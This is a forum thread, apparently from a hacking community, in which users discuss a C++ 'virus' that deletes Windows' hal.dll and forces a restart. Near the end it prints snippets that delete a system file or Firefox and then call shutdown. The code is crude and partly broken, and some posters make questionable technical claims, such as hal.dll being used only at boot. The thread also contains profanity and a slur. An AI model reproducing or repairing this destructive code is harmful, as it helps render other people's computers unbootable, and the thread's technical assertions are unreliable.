    This is pretty nice. I know quite a bit about programming with C++, but this just taught me some new info. Thanks very much.

    Add me on AIM <-- Hacky09. I want to talk to you a little about C++ if you programmed this. I'm not retarded about it, I've only been programming for 6 months though.

    I don't have AIM, if you are asking. I do have msn though, you can add me at:

    PHP:
    sid@hacktalk.org
    It's a bit off-topic though.

    Anyone else need any help on C++?

    Alright, I added you. I don't really like MSN, but that's just because all my "IRL" friends use AIM. So, when ever you get on, we can "C++" talk.

    Thanks.

    Wow, since Window's loads HAL.dll on startup, that means it's constantly using it.

    Therefore, removal would be denied.

    This virus not powerful at all. Just connect hdd to another computer and transfer file which you need to fix it. Powerfull virus means- a virus who mades a lot of damages, damage many files so you lost a lot of information, also damages operating system.

    I noticed that someone posted that on rohitab too :) But The End beat me to telling u about it.. Well, the people at rohitab didnt really like this :p

    I dont see this as too "powerful".. Just deletes a file :)

    What someone commented about this:

    "... Ok I'm tired of this...

    ALL NUBS PLEASE READ THE FOLLOWING!
    Im tired of people coding and posting things they themselves do not understand. What the hell is the point of making a program that deletes hal.dll when you have no idea what the fuck that file does.... secondly everyone needs to start testing and debugging their code before posting it. Stop posting code like the shit above that doesn't even work asking for people opinions... its a waste of time and space."

    All "NUBS" please read the following?

    I think I do understand what I am posting. "Hal".dll is only used WHILE starting up, not while windows is running. It plays an important role during BOOTUP only, and is an element of the BOOT loader. So, before being profane, I suggest you do a bit of research.

    What the hell are you tired of anyway? Reading a post? Why don't you go outside and play football or do some physical work? Maybe you'll get a bit more energy.

    And, I did debug this code inside a VMWare Workstation running Windows XP, inside Ubuntu Linux (Feisty Fawn). So, please think before you post. Profanity won't get you anywhere ;)

    This post should be removed. Malicious code has never been supported by Sythe.org, and it never should be.

    No one is compiling this and sending it to everyone. This is the most active thread in this particular forum; it should not be removed. On the other hand, your post counts as spam. I think that this thread is useful for everyone who wants to learn how to delete a file in C++.

    Please realize that I did not post a compiled executable but some mere source.

    Windows uses Hal.dll as an element of the boot loader, before the GUI is loaded. If you are more familiar with linux, think of it as a part of GRUB or LILO, it isn't used while the main OS functions.

    Sorry for the double post.

    Code:
     #include <cstdlib>
    #include <iostream>

    using namespace std;

    int main(int argc, char *argv[])
    {
        std::remove("C:\\program_files\mozilla_firefox\firefox.exel"); //PWNAGE TIME
    }
    The above code will not work. First of all, it is "Program Files" not "Program_Files". Secondly, double slashes will have to be inserted instead of single ones. The C++ interpreter will not read the "M" of Mozilla and the "F" of Firefox. Why? Because they both have a slash placed directly to their left.

    int main(int argc, char *argv[])
    {
    std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
    system("shutdown -s -r");
    system("PAUSE");
